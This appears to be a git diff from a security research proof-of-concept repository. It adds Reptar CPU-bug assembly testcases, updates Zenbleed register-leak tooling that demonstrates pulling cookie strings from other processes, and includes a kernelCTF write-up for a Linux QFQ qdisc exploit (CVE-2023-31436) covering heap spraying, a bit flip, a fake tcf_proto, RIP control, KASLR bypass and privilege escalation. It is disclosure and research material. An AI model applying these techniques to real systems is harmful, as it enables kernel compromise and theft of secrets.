b/pocs/cpus/reptar/minimized/reptar.uncan.elf.bin.asm @@ -0,0 +1,35 @@ +%define TINY_ELF_BASE_ADDRESS 0x7fffffffe000 +%macro TINY_ELF_PAYLOAD 0 +_start: + lea rax, [rsp - 0x1000] + mov r15, .skip_reptar_alias + jmp r15 + align 16 + .loop_for_every_iteration: + .loop_only_on_bug: + clflush [rax] + clflush [rax+64] + mov rsi, rax + mov rdi, rax + mov cl, 1 + align 16 + inc rbp + clflush [rax] + clflush [rax+1] + .reptar: + rep + db 0x44; rex.r + movsb + .after_reptar: + pause + times 64 nop + jmp r15 + .skip_reptar_alias: + inc rdx + jmp .loop_for_every_iteration + .end_of_program: + int3 + int3 +%endmacro + +%include "third_party/tiny_elf.asm" diff --git a/pocs/cpus/reptar/minimized/reptar.vdso.elf.bin.asm b/pocs/cpus/reptar/minimized/reptar.vdso.elf.bin.asm new file mode 100644 index 00000000..22a87338 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.vdso.elf.bin.asm @@ -0,0 +1,60 @@ +%define TINY_ELF_BASE_ADDRESS 0x7ffff7ff8000 +%macro TINY_ELF_PAYLOAD 0 +_start: + lea rax, [rsp - 0x1000] + mov rbx, rax + mov r14, 0x41 + xor rbp, rbp + mov rdx, .end_of_program + lea r13, [rsp-0x4000] + mov r15, .skip_reptar_alias + push rdx + xor rdx, rdx + align 128 + times 0x700 nop + .loop_for_every_iteration: + .loop_only_on_bug: + clflush [rax] + clflush [rax+64] + mov rsi, rax + mov rdi, rax + mov cl, 1 + add rdx, 1 + mov r9, rdx + sub r9, rbp + cmp r9, 0xb0 ; we are past vdso + cmova rax, r13 ; this will PF but recover + cmova rbx, r14 + align 64 + times 64-16 nop + clflush [rax] + clflush [rbx+1] + .reptar: + rep + db 0x44; rex.r + movsb + .after_reptar: + rep + times 64 nop + jmp r15 + + .reptar_alias: + nop + nop + nop + .after_reptar_alias: + times 100 nop + ; kill + mov eax, 0 + mov ebx, 0 + int 0x80 + + .skip_reptar_alias: + inc rbp + jmp .loop_for_every_iteration + .end_of_program: + int3 + int3 +%endmacro + +%include "third_party/tiny_elf.asm" diff --git a/pocs/cpus/reptar/minimized/reptar.xlat.elf.asm b/pocs/cpus/reptar/minimized/reptar.xlat.elf.asm new file mode 100644 index 00000000..de1eb7c7 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.xlat.elf.asm @@ -0,0 +1,50 @@ +BITS 64 + +global _start + +section .text + _start: + mov rbx, data + lea rsi, [rsp+1] + mov rdi, rsi + jmp .suffix + .attack: + %rep 1 + align 0x1000 + ; 16 bytes + times 4 nop ; 4 bytes + dec rsi ; 3 bytes + dec rdi ; 3 bytes + inc rdx ; 3 bytes + inc rcx ; 3 bytes + ; 16 bytes + clflush [rdi] ; 3 bytes + clflush [rsi+64] ; 4 bytes + mov [rsp], rdx ; 4 bytes + rep ; 1 byte + db 0x44; rex.r ; 1 byte + movsb ; 1 byte + rep ; 1 byte + nop ; 1 byte + %endrep + .suffix: + align 0x1000 + times 0x1000*8 xlat ; mov al, ds:[ebx+al] + mov dil, dl ; counter + syscall + mov rax, 1 ; exit + xor ecx, ecx; clear ecx + jmp .attack + +section .data + align 0x1000 + data: + db 24 ; first iteration (yield) + db 60 ; second iteration (exit) + times 22 db 34 + db 24 ; data[24]=24 + times 9 db 34 + db 34 ; data[34]=34 + times 25 db 34 + db 60 ; data[60]=60 + times 0x1000-60 db 34 ; (pause) diff --git a/pocs/cpus/reptar/minimized/third_party/long_mode_boot.asm b/pocs/cpus/reptar/minimized/third_party/long_mode_boot.asm new file mode 100644 index 00000000..91a62921 --- /dev/null +++ b/pocs/cpus/reptar/minimized/third_party/long_mode_boot.asm @@ -0,0 +1,200 @@ +; Stolen from https://wiki.osdev.org/Entering_Long_Mode_Directly +%ifnmacro LONG_MODE_BOOT_PAYLOAD + %macro LONG_MODE_BOOT_PAYLOAD 0 + ; Display "Hello World!" + mov edi, 0x00b8000 + + mov rax, 0x1F6C1F6C1F651F48 + mov [edi],rax + + mov rax, 0x1F6F1F571F201F6F + mov [edi + 8], rax + + mov rax, 0x1F211F641F6C1F72 + mov [edi + 16], rax + + jmp $ + %endmacro +%endif + +%define FREE_SPACE 0x1000 + +ORG 0x7C00 +BITS 16 + +; Main entry point where BIOS leaves us. + +Main: + jmp 0x0000:.FlushCS ; Some BIOS' may load us at 0x0000:0x7C00 while other may load us at 0x07C0:0x0000. + ; Do a far jump to fix this issue, and reload CS to 0x0000. + +.FlushCS: + xor ax, ax + + ; Set up segment registers. + mov ss, ax + ; Set up stack so that it starts below Main. + mov sp, Main + + mov ds, ax + mov es, ax + mov fs, ax + mov gs, ax + cld + + mov ah, 0x02 + mov al, 1 + LongProgramSize/512 + mov ch, 0x00 + mov dh, 0x00 + mov cl, 0x02 + mov dl, 0x00 + mov bx, LongProgram + int 0x13 + + ; Point edi to a free space bracket. + mov edi, FREE_SPACE + ; Switch to Long Mode. + jmp SwitchToLongMode + +BITS 16 + + +%define PAGE_PRESENT (1 << 0) +%define PAGE_WRITE (1 << 1) + +%define CODE_SEG 0x0008 +%define DATA_SEG 0x0010 + +ALIGN 4 +IDT: + .Length dw 0 + .Base dd 0 + +; Function to switch directly to long mode from real mode. +; Identity maps the first 2MiB. +; Uses Intel syntax. + +; es:edi Should point to a valid page-aligned 16KiB buffer, for the PML4, PDPT, PD and a PT. +; ss:esp Should point to memory that can be used as a small (1 uint32_t) stack + +SwitchToLongMode: + ; Zero out the 16KiB buffer. + ; Since we are doing a rep stosd, count should be bytes/4. + push di ; REP STOSD alters DI. + mov ecx, 0x1000 + xor eax, eax + cld + rep stosd + pop di ; Get DI back. + + + ; Build the Page Map Level 4. + ; es:di points to the Page Map Level 4 table. + lea eax, [es:di + 0x1000] ; Put the address of the Page Directory Pointer Table in to EAX. + or eax, PAGE_PRESENT | PAGE_WRITE ; Or EAX with the flags - present flag, writable flag. + mov [es:di], eax ; Store the value of EAX as the first PML4E. + + + ; Build the Page Directory Pointer Table. + lea eax, [es:di + 0x2000] ; Put the address of the Page Directory in to EAX. + or eax, PAGE_PRESENT | PAGE_WRITE ; Or EAX with the flags - present flag, writable flag. + mov [es:di + 0x1000], eax ; Store the value of EAX as the first PDPTE. + + + ; Build the Page Directory. + lea eax, [es:di + 0x3000] ; Put the address of the Page Table in to EAX. + or eax, PAGE_PRESENT | PAGE_WRITE ; Or EAX with the flags - present flag, writeable flag. + mov [es:di + 0x2000], eax ; Store to value of EAX as the first PDE. + + + push di ; Save DI for the time being. + lea di, [di + 0x3000] ; Point DI to the page table. + mov eax, PAGE_PRESENT | PAGE_WRITE ; Move the flags into EAX - and point it to 0x0000. + + + ; Build the Page Table. +.LoopPageTable: + mov [es:di], eax + add eax, 0x1000 + add di, 8 + cmp eax, 0x200000 ; If we did all 2MiB, end. + jb .LoopPageTable + + pop di ; Restore DI. + + ; Disable IRQs + mov al, 0xFF ; Out 0xFF to 0xA1 and 0x21 to disable all IRQs. + out 0xA1, al + out 0x21, al + + nop + nop + + lidt [IDT] ; Load a zero length IDT so that any NMI causes a triple fault. + + ; Enter long mode. + mov eax, 10100000b ; Set the PAE and PGE bit. + mov cr4, eax + + mov edx, edi ; Point CR3 at the PML4. + mov cr3, edx + + mov ecx, 0xC0000080 ; Read from the EFER MSR. + rdmsr + + or eax, 0x00000100 ; Set the LME bit. + wrmsr + + mov ebx, cr0 ; Activate long mode - + or ebx,0x80000001 ; - by enabling paging and protection simultaneously. + mov cr0, ebx + + lgdt [GDT.Pointer] ; Load GDT.Pointer defined below. + + jmp CODE_SEG:LongMode ; Load CS with 64 bit segment and flush the instruction cache + + + ; Global Descriptor Table +GDT: +.Null: + dq 0x0000000000000000 ; Null Descriptor - should be present. + +.Code: + dq 0x00209A0000000000 ; 64-bit code descriptor (exec/read). + dq 0x0000920000000000 ; 64-bit data descriptor (read/write). + +ALIGN 4 + dw 0 ; Padding to make the "address of the GDT" field aligned on a 4-byte boundary + +.Pointer: + dw $ - GDT - 1 ; 16-bit Size (Limit) of GDT. + dd GDT ; 32-bit Base Address of GDT. (CPU will zero extend to 64-bit) + + +[BITS 64] +LongMode: + mov ax, DATA_SEG + mov ds, ax + mov es, ax + mov fs, ax + mov gs, ax + mov ss, ax + + ; Blank out the screen to a blue color. + mov edi, 0xB8000 + mov rcx, 500 ; Since we are clearing uint64_t over here, we put the count as Count/4. + mov rax, 0x1F201F201F201F20 ; Set the value to set the screen to: Blue background, white foreground, blank spaces. + rep stosq ; Clear the entire screen. + + jmp LongProgram + +BITS 16 + +times 510 - ($-$$) db 0 +dw 0xAA55 + +[BITS 64] +LongProgram: + LONG_MODE_BOOT_PAYLOAD + +LongProgramSize equ $ - LongProgram diff --git a/pocs/cpus/reptar/minimized/third_party/tiny_elf.asm b/pocs/cpus/reptar/minimized/third_party/tiny_elf.asm new file mode 100644 index 00000000..48129c30 --- /dev/null +++ b/pocs/cpus/reptar/minimized/third_party/tiny_elf.asm @@ -0,0 +1,48 @@ +; stolen from https://stackoverflow.com/questions/53382589/smallest-executable-program-x86-64 +%ifndef TINY_ELF_BASE_ADDRESS + %define TINY_ELF_BASE_ADDRESS 0x400000 +%endif + +%ifnmacro TINY_ELF_PAYLOAD + %macro TINY_ELF_PAYLOAD 0 + _start: + %endmacro +%endif + +bits 64 + org TINY_ELF_BASE_ADDRESS + +ehdr: ; Elf64_Ehdr + db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident + times 8 db 0 + dw 2 ; e_type + dw 62 ; e_machine + dd 1 ; e_version + dq _start ; e_entry + dq text_phdr - $$ ; e_phoff + dq 0 ; e_shoff + dd 0 ; e_flags + dw ehdrsize ; e_ehsize + dw phdrsize ; e_phentsize + dw 1 ; e_phnum + dw 0 ; e_shentsize + dw 0 ; e_shnum + dw 0 ; e_shstrndx + +ehdrsize equ $ - ehdr + +text_phdr: ; Elf64_Phdr + dd 1 ; p_type + dd 5 ; p_flags + dq 0 ; p_offset + dq $$ ; p_vaddr + dq $$ ; p_paddr + dq textsize ; p_filesz + dq textsize ; p_memsz + dq 0x1000 ; p_align + +phdrsize equ $ - text_phdr + +TINY_ELF_PAYLOAD + +textsize equ $ - $$ \ No newline at end of file diff --git a/pocs/cpus/reptar/syscalls.asm b/pocs/cpus/reptar/syscalls.asm new file mode 100644 index 00000000..2658ffbf --- /dev/null +++ b/pocs/cpus/reptar/syscalls.asm @@ -0,0 +1,5 @@ +%define SYS_sched_yield 0x18 +%define SYS32_sched_yield 0x9e +%define SYS_exit 0x3c +%define SYS_alarm 0x25 +%define SYS_pause 0x22 diff --git a/pocs/cpus/reptar/threads.c b/pocs/cpus/reptar/threads.c new file mode 100644 index 00000000..e96e8bed --- /dev/null +++ b/pocs/cpus/reptar/threads.c @@ -0,0 +1,52 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "threads.h" + +// This wrapper spawns a thread locked to a specific CPU. +pthread_t spawn_thread_core(void *(*start_routine)(void *), void *restrict arg, int cpu) +{ + pthread_t tid = 0; + pthread_attr_t attr; + cpu_set_t set; + + // Unspecified + if (cpu < 0 || !start_routine) + return tid; + + pthread_attr_init(&attr); + CPU_ZERO(&set); + CPU_SET(cpu, &set); + + if (pthread_attr_setaffinity_np(&attr, sizeof(cpu_set_t), &set) != 0) + err(EXIT_FAILURE, "failed to lock thread to specified core %d", cpu); + if (pthread_create(&tid, &attr, start_routine, arg) != 0) + err(EXIT_FAILURE, "failed to start thread on specifed core %d", cpu); + pthread_attr_destroy(&attr); + return tid; +} + +int set_cpu_affinity(int cpu) +{ + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + + if (sched_setaffinity(0, sizeof(set), &set) != 0) { + err(EXIT_FAILURE, "failed to set cpu affinity"); + } + return 0; +} diff --git a/pocs/cpus/reptar/threads.h b/pocs/cpus/reptar/threads.h new file mode 100644 index 00000000..35f9af9d --- /dev/null +++ b/pocs/cpus/reptar/threads.h @@ -0,0 +1,7 @@ +#ifndef __THREADS_H +#define __THREADS_H + +pthread_t spawn_thread_core(void *(*start_routine)(void *), void *restrict arg, int cpu); +int set_cpu_affinity(int cpu); + +#endif diff --git a/pocs/cpus/reptar/util.c b/pocs/cpus/reptar/util.c new file mode 100644 index 00000000..14f6a646 --- /dev/null +++ b/pocs/cpus/reptar/util.c @@ -0,0 +1,79 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "util.h" + +bool quiet; + +void logmsg(char *format, ...) +{ + va_list ap; + // Try to limit console noise. + if (quiet == true) + return; + + // Print a debugging message. + va_start(ap, format); + vfprintf(stderr, format, ap); + fputc('\n', stderr); + va_end(ap); + return; +} + +void print(char *format, ...) +{ + va_list ap; + // Try to limit console noise. + if (quiet == true) + return; + + // Print a debugging message. + va_start(ap, format); + vfprintf(stdout, format, ap); + va_end(ap); + return; +} + +bool num_inrange(char *range, int num) +{ + char *r, *s, *e; + + // Example: + // 1,2,3,4-8,2 + + if (range == NULL) + return false; + + s = strtok_r(strdupa(range), ",", &r); + + while (s) { + int start; + int end; + + start = end = strtoul(s, &e, 0); + + if (*e == '-') { + end = strtoul(++e, &e, 0); + } + + if (*e != '\0' || end < start) { + errx(EXIT_FAILURE, "The range %s was not valid (example: 1,2,3,4-5)", s); + } + + if (num >= start && num <= end) + return true; + + s = strtok_r(NULL, ",", &r); + } + + return false; +} diff --git a/pocs/cpus/reptar/util.h b/pocs/cpus/reptar/util.h new file mode 100644 index 00000000..2456004d --- /dev/null +++ b/pocs/cpus/reptar/util.h @@ -0,0 +1,10 @@ +#ifndef __UTIL_H +#define __UTIL_H + +extern bool quiet; + +void logmsg(char *format, ...); +void print(char *format, ...); +bool num_inrange(char *range, int num); + +#endif diff --git a/pocs/cpus/zenbleed/README.md b/pocs/cpus/zenbleed/README.md index 48ca42f3..b7f6a08d 100644 --- a/pocs/cpus/zenbleed/README.md +++ b/pocs/cpus/zenbleed/README.md @@ -29,6 +29,7 @@ We have confirmed this bug is reproducible on at least the following SKUs: - `AMD Ryzen Threadripper PRO 3945WX 12-Cores` - `AMD Ryzen 7 PRO 4750GE with Radeon Graphics` - `AMD Ryzen 7 5700U` +- `AMD Ryzen 7 4800h` - `AMD EPYC 7B12` In general, we believe all Zen 2 processors are affected, including "Rome" @@ -85,12 +86,11 @@ Please type `make` to build the testcase. ``` $ ./zenbleed -h -*** EMBARGOED SECURITY ISSUE -- DO NOT DISTRIBUTE! *** ZenBleed Testcase -- taviso@google.com NOTE: Try -h to see configuration options -Usage: ./zenleak [OPTIONS] +Usage: ./zenbleed [OPTIONS] -v N Select a variant leak kernel, different kernels work better on different SKUs. -m N Stop after leaking N values, useful for benchmarking. -H N Spawn a 'hammer' thread on core N, produces recognizable values for testing. @@ -112,7 +112,7 @@ For example, a command like `while true; do sort < /etc/passwd > /dev/null; done This should generate some recognizable register throughput, like this: ``` -$ ./zenleak +$ ./zenbleed Thread 0x7f26b92346c0 running on CPU 0 Thread 0x7f26b8a336c0 running on CPU 2 Thread 12: "999:999:systemd " @@ -169,7 +169,7 @@ registers for a string that looks like that. As it learns more of the string that follows, it will extend the search to continue the pattern. ``` -$ ./zenleak -q -p "SID=" +$ ./zenbleed -q -p "SID=" SID=cieX4meceechoo2UThooh5uu; 1P_JAR=2023-05-17-21; S^C ``` diff --git a/pocs/cpus/zenbleed/pattern.c b/pocs/cpus/zenbleed/pattern.c index 3bb97131..124b1675 100644 --- a/pocs/cpus/zenbleed/pattern.c +++ b/pocs/cpus/zenbleed/pattern.c @@ -19,8 +19,6 @@ // // This is a Work-in-Progress testcase for the Zenbleed vulnerability. // -// ** DO NOT DISTRIBUTE - EMBARGOED SECURITY ISSUE ** -// // Tavis Ormandy // diff --git a/pocs/cpus/zenbleed/zenbleed.c b/pocs/cpus/zenbleed/zenbleed.c index 50639602..1e95945c 100644 --- a/pocs/cpus/zenbleed/zenbleed.c +++ b/pocs/cpus/zenbleed/zenbleed.c @@ -19,8 +19,6 @@ // // This is a Work-in-Progress testcase for the Zenbleed vulnerability. // -// ** DO NOT DISTRIBUTE - EMBARGOED SECURITY ISSUE ** -// // Tavis Ormandy // @@ -216,7 +214,6 @@ static pthread_t spawn_thread_core(void *(*start_routine)(void *), void *restric static void print_banner() { - logmsg("*** EMBARGOED SECURITY ISSUE -- DO NOT DISTRIBUTE! ***"); logmsg("ZenBleed Testcase -- taviso@google.com"); logmsg(""); logmsg("NOTE: Try -h to see configuration options"); diff --git a/pocs/cpus/zenbleed/zenleak.asm b/pocs/cpus/zenbleed/zenleak.asm index 5a0104b5..caf9b45f 100644 --- a/pocs/cpus/zenbleed/zenleak.asm +++ b/pocs/cpus/zenbleed/zenleak.asm @@ -3,8 +3,6 @@ BITS 64 ; ; This is a Work-in-Progress testcase for the Zenbleed vulnerability. ; -; ** DO NOT DISTRIBUTE - EMBARGOED SECURITY ISSUE ** -; ; Tavis Ormandy ; diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/exploit.md new file mode 100644 index 00000000..4a735fb6 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/exploit.md @@ -0,0 +1,427 @@ +Exploit Details +=============== + +Exploit demo for CVE-2023-31436. +Flag: `kernelCTF{v1:mitigation-6.1-v2:1688980403:8075e41586a95a7128a3f9feb6dfddd242bcc92d}` + +# Summary + +At a high level the exploit performs the following: + +- Spray QFQ qdiscs along with user controlled buffers into `dyn-kmalloc-8192` +- Spray user controlled objects into `kmalloc-128` +- Trigger the vulnerability into one user controlled buffer, leaving us with a controllable `struct qfq_group` object +- Use the controlled `struct qfq_group` object to corrupt the `struct qfq_sched->filter_list` member so that it + points to our user controlled object in `kmalloc-128` + +Note: The original exploit targeted the `mitigation-6.1-broken` instance, it was later modified to work on `mitigation-6.1-v2`. + +# Steps in Detail + +## Step 1: Abusing the Vulnerability + +Triggering the vulnerability is trivial, though actually taking something useful +out of the out-of-bounds group is not obvious. +Even though the pointer is used in a few places I only identified two places which +seem particularly interesting from a exploitation perspective: +```c +static void qfq_slot_insert(struct qfq_group *grp, struct qfq_aggregate *agg, + u64 roundedS) +{ +// ... + hlist_add_head(&agg->next, &grp->slots[i]); // [1.1] + __set_bit(slot, &grp->full_slots); // [1.2] +} + + +static void qfq_schedule_agg(struct qfq_sched *q, struct qfq_aggregate *agg) +{ + struct qfq_group *grp = agg->grp; +// ... + s = qfq_calc_state(q, grp); + __set_bit(grp->index, &q->bitmaps[s]); // [2] +// ... +} +``` + +Looking at `qfq_slot_insert` we can see that we can write a pointer to a aggregate +into the slots array [1.1]. Controlling `i` is not trivial, but may be possible. +This way we can potentially write a pointer into a following object in the `dyn-kmalloc-8192` +slab. +Eventually this could lead to a UaF scenario after the aggregate is destroyed. +Due to the complexities involved in controlling the index along with the correct +alignment I decided against this path. + +This leaves us with a bit set operation at a controlled index [2]. +The idea will be to flip a bit on a pointer to eventually cause a type confusion. +Looking at the `struct qfq_sched` we can see that there are only few members +available to us after the `bitmaps[]` member (we cannot use a negative index). + +```c +struct qfq_sched { + struct tcf_proto __rcu *filter_list; + struct tcf_block *block; + struct Qdisc_class_hash clhash; + + u64 oldV, V; /* Precise virtual times. */ + struct qfq_aggregate *in_serv_agg; /* Aggregate being served. */ + u32 wsum; /* weight sum */ + u32 iwsum; /* inverse weight sum */ + + unsigned long bitmaps[QFQ_MAX_STATE]; /* Group bitmaps. */ + struct qfq_group groups[QFQ_MAX_INDEX + 1]; /* The groups. */ + u32 min_slot_shift; /* Index of the group-0 bit in the bitmaps. */ + + u32 max_agg_classes; /* Max number of classes per aggr. */ + struct hlist_head nonfull_aggs; /* Aggs with room for more classes. */ +}; +``` + +The `nonfull_aggs` member is interesting as this list will be used to lookup +aggregates when creating new classes: +```c +static struct qfq_aggregate *qfq_find_agg(struct qfq_sched *q, + u32 lmax, u32 weight) +{ + struct qfq_aggregate *agg; + + hlist_for_each_entry(agg, &q->nonfull_aggs, nonfull_next) + if (agg->lmax == lmax && agg->class_weight == weight) + return agg; + + return NULL; +} +``` +Originally I planned to smuggle a fake `qfq_aggregate` into the qdisc which is +hopefully freed when destroying the class that possesses it. +This way we can have a UaF in the `kmalloc-128` slab. +Anyway I could not find a suitable object which would allow us to control all the +relevant members (`lmax`, `class_weight`, `num_classes`). +Therefor we will try to flip a bit on an object after the qdisc. +Naturally this will be the object that we used to create the fake group, however +the following seemed easier (though less stable): + +``` + ++-qfq qdisc----+ +| ... | +| filter_list | ---------------------+ +| ... | +-----> 0100 +-tcf_proto-+ +| bitmaps[] | | | +| groups[] | | | +| ... | +-----------+ ++--------------+ + 0180 +-fake obj--+ ++-controlled o-+ | + +| ... | | + +| fake grp {} | +-----------+ +| | +| ... | +---x--------------> 0200 +-tcf_proto-+ +| ... | | x | | +| | | x flip | | ++--------------+ | x a bit +-----------+ + | x ++-qfq qdisc----+ | x--------------> 0280 +-fake obj--+ +| ... | | | | +| filter_list | --------+ | | +| ... | +-----------+ +| bitmaps[] | +| groups[] | 0300 +-fake obj--+ +| ... | | | ++--------------+ | | + +-----------+ +``` + +By targeting a bit of the `filter_list` member of the qdisc after the user controlled +object we will potentially be able to inject a malicious `struct tcf_proto` object +into the qdisc. +This object can be abused for trivial RIP control via the `classify()` member, +which will be called in `qfq_enqueue`. + +```c +// in include/net/sch_generic.h + +struct tcf_proto { + /* Fast access part */ + struct tcf_proto __rcu *next; + void __rcu *root; + + /* called under RCU BH lock*/ + int (*classify)(struct sk_buff *, + const struct tcf_proto *, + struct tcf_result *); + __be16 protocol; + + /* All the rest */ + u32 prio; + void *data; + const struct tcf_proto_ops *ops; + struct tcf_chain *chain; + /* Lock protects tcf_proto shared state and can be used by unlocked + * classifiers to protect their private data. + */ + spinlock_t lock; + bool deleting; + refcount_t refcnt; + struct rcu_head rcu; + struct hlist_node destroy_ht_node; +}; +``` + +### Step 1.1: QFQ Internal State Control + +Looking at the code in `qfq_change_class()` we can see that `qfq_add_to_agg()` +is called with the new `agg`: + +```c +// net/sched/sch_qfq.c + +/* Add class to aggregate. */ +static void qfq_add_to_agg(struct qfq_sched *q, + struct qfq_aggregate *agg, + struct qfq_class *cl) +{ + cl->agg = agg; + + qfq_update_agg(q, agg, agg->num_classes+1); // [1] + if (cl->qdisc->q.qlen > 0) { /* adding an active class */ + list_add_tail(&cl->alist, &agg->active); + if (list_first_entry(&agg->active, struct qfq_class, alist) == + cl && q->in_serv_agg != agg) /* agg was inactive */ + qfq_activate_agg(q, agg, enqueue); /* schedule agg */ // [2] + } +} +``` + +After the out-of-bound group is stored into the aggregate in [1] we can +hit `qfq_activate_agg()` [2]. + +```c +/* Update agg ts and schedule agg for service */ +static void qfq_activate_agg(struct qfq_sched *q, struct qfq_aggregate *agg, + enum update_reason reason) +{ + agg->initial_budget = agg->budget = agg->budgetmax; /* recharge budg. */ + + qfq_update_agg_ts(q, agg, reason); + if (q->in_serv_agg == NULL) { /* no aggr. in service or scheduled */ + q->in_serv_agg = agg; /* start serving this aggregate */ + /* update V: to be in service, agg must be eligible */ + q->oldV = q->V = agg->S; + } else if (agg != q->in_serv_agg) + qfq_schedule_agg(q, agg); // [3] +} +``` + +After passing the checks in `qfq_activate_agg()` we will call the desired +`qfq_schedule_agg()` [3]. + +In order to hit these code paths we need to fullfill certain constraints: +1. `q->in_serv_agg != NULL` and `q->in_serv_agg != new_oob_agg` +2. (sub) qdisc of the owning class of the aggregate needs to be non-empty (`cl->qdisc->q.qlen > 0`) + +We can control `q->in_serv_agg` by enqueuing packets: +```c +static int qfq_enqueue(struct sk_buff *skb, struct Qdisc *sch, + struct sk_buff **to_free) +{ +// ... + qfq_activate_agg(q, agg, enqueue); +// ... +} +``` +Initially `q->in_serv_agg` will be `NULL`, thus we will hit the second branch +in `qfq_activate_agg()` (see above). + +The problem is that, right after enqueuing the packet, the dequeue operation +will reset the state (unless we generate enormous amounts of traffic so that +the scheduling actually kicks in, which however still leaves us with a race). +In order to work around that problem we will modify the sub qdisc of the class +to be a `netem` qdisc, which allows us to add a generously chosen delay, so that +the dequeue operation fails because no packet is available yet. +This will issue a warning in `qfq_peek_skb()`, but that will not be problem for us. + +This solves constraint number one. As a bonus this naturally solves constraint +number two because the underlaying netem qdisc has in fact packets queued, +they are just delayed. + +### Step 2: Heap Spray + +### Step 2.1: QFQ qdiscs and `dyn-malloc-8192` + +To successfully make use of the vulnerability we need a controllable object in +the `dyn-kmalloc-8192` cache. + +The qdisc is allocated by `qdisc_alloc()`: +```c +// qdisc_alloc() in net/sched/sch_generic.c + struct Qdisc *sch; + +// .. + + dev = dev_queue->dev; + sch = kzalloc_node(size, GFP_KERNEL, netdev_queue_numa_node_read(dev_queue)); +``` + +This size is a) not compile time constant and b) allocated with `GFP_KERNEL`, +so we need an object which satisfies both as well. + +I chose `struct qdisc_size_table`, as it has all those properties: +```c +// qdisc_get_stab() in net/sched/sch_api.c + + struct qdisc_size_table *stab; +// .. + stab = kmalloc(struct_size(stab, data, tsize), GFP_KERNEL); +``` +To get the desired layout, we will allocate one sizetable alongside each qdisc we +spray. This way we hopefully get the desired alternating layout. +One should note, that the different sizetables need not be equal, otherwise no +allocation would be made. + +In order to spray the qdiscs we will create child processes, each with a new +network namespace to isolate each qdisc. + +### Step 2.2: `struct tcf_proto`s and `kmalloc-128` + +As mentioned earlier, we will try to modify the `q->filter_list` member in order to point +to a nearby user controlled object. +`struct tcf_proto` is allocated in `kmalloc-128` with `GFP_KERNEL` so we will need +a similar statically sized object. + +I found [XDP](https://www.kernel.org/doc/html/latest/networking/af_xdp.html) to be +very useful for this. Specifically we will use `struct xdp_mem` for this purpose, +as the `void *addrs` member overlays perfectly with the `struct tcf_proto __rcu *next` +member of `struct tcf_proto`: + +```c +// in include/net/xdp_sock.h, size = 112 bytes + +struct xdp_umem { + void *addrs; + u64 size; + u32 headroom; + u32 chunk_size; + u32 chunks; + u32 npgs; + struct user_struct *user; + refcount_t users; + u8 flags; + bool zc; + struct page **pgs; + int id; + struct list_head xsk_dma_list; + struct work_struct work; +}; +``` + +This structure is a nice primitive, as it allows us to create arbitrary kernel objects. +Furthermore we will have arbitrary read / write for the created kernel objects, if we would need it. +`XDP` allows the creation of shared memory buffers between kernel and userspace. +When creating the `AF_XDP` socket and registering the shared memory through `setsockopt()`, +the `addrs` member will be mapped directly to the userspace buffer. +Any code dereferencing this address will therefor use our controlled buffer. +This fits perfectly onto our `struct tcf_proto` as it is implementing a simple +forward list with the first member. + +In order to spray those objects, we will simply create many `AF_XDP` sockets and +register memory for each of them. + +## Step 3: Getting RIP Control + +By constructing a fake `struct tcf_proto` object with a suitable `classify` member +we are on a good way to gain arbitrary kernel code execution: + +```c +// in net/sched/sch_qfq.c +static struct qfq_class *qfq_classify(struct sk_buff *skb, struct Qdisc *sch, + int *qerr) +{ + struct qfq_sched *q = qdisc_priv(sch); + struct tcf_proto *fl; +// .. + fl = rcu_dereference_bh(q->filter_list); + result = tcf_classify(skb, NULL, fl, &res, false); +// .. +} + +// in net/sched/cls_api.c +static inline int __tcf_classify(struct sk_buff *skb, + const struct tcf_proto *tp, + const struct tcf_proto *orig_tp, + struct tcf_result *res, + bool compat_mode, + u32 *last_executed_chain) +{ +// .. + for (; tp; tp = rcu_dereference_bh(tp->next)) { + __be16 protocol = skb_protocol(skb, false); + int err; + + if (tp->protocol != protocol && + tp->protocol != htons(ETH_P_ALL)) + continue; + + err = tp->classify(skb, tp, res); +// .. +} +``` + +Even though we created a fake object for `kmalloc-128` we do not have any real size +restrictions on the payload. +`tp->classify` is called with the `tp` object as a second parameter (into `rsi`), +which serves as a perfect candidate for a stack pivot onto the fake object. + +One downside of the chosen entrypoint into the kernel is the fact, that we are in an +interrupt context. Thus we cannot simply return to usermode naively. +To overcome this issue we will restore the execution right at the end of `qfq_enqueue` +so that the kernel will deal with this problem on its own. +Right as we enter `rbp` will contain a stack pointer. +We copy this pointer to a save location in memory and eventually restore the stack frame. + +Besides that, we will construct a common privilege escalation payload. + +# KASLR Bypass + +The exploit itself is single bit write only, we did not construct any leak primitives. +In order to get a kernel pointer to bypass KASLR, we will adapt timing side channels +for simplicity reasons. +While PTI is not enabled, this works very well in practice. + +The code for that is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h + +# General Notes on the Exploit + +The exploit makes heavy use of multiprocessing in order to simplify the use +of the network namespaces (recall we use one network namespace for each QFQ qdisc we +create.) + +The main function performs coordination of the child processes. +The children will notify the parent through a simple wait based event system. +Qdiscs and spraying of fake classifiers are handled by child threads in `bug_worker()`. +We will select one of those workers to trigger the vulnerability, the others +will try to trigger RIP control. +If the bitflip failed, we will notice that we do not have root privileges. +Besides that, nothing is in an unstable state and we can try again. + +Finally note that the exploit does not make use of any netlink library or the like. +Therefor, you may notice that the code related to netlink is quite verbose. +Reasons for that are unknown (maybe I did not know how to use the libraries.) + +## Stability + +The main stability problem is the initial heap spray where we try to achieve a three-way +aligned layout in `dyn-kmalloc-8192`. +In order to improve the reliablity of this step, we pin the orchestration to +a dedicated CPU while the workers (that perform the spray), are pinned to another +one. +This greatly increases the likeylhood of hitting the correct layout, however +chances are still quite low (~10%) + +Overall this contributes to an observed stability of about 5%. + +Finally, one should note that the exploit is not performing a decent +post-exploitation cleanup. +The QFQ qdisc class which triggered the vulnerability is not properly cleaned up, thus +as soon as the timers for dequeue operations fire, the kernel will likely +panic. diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/novel-techniques.md new file mode 100644 index 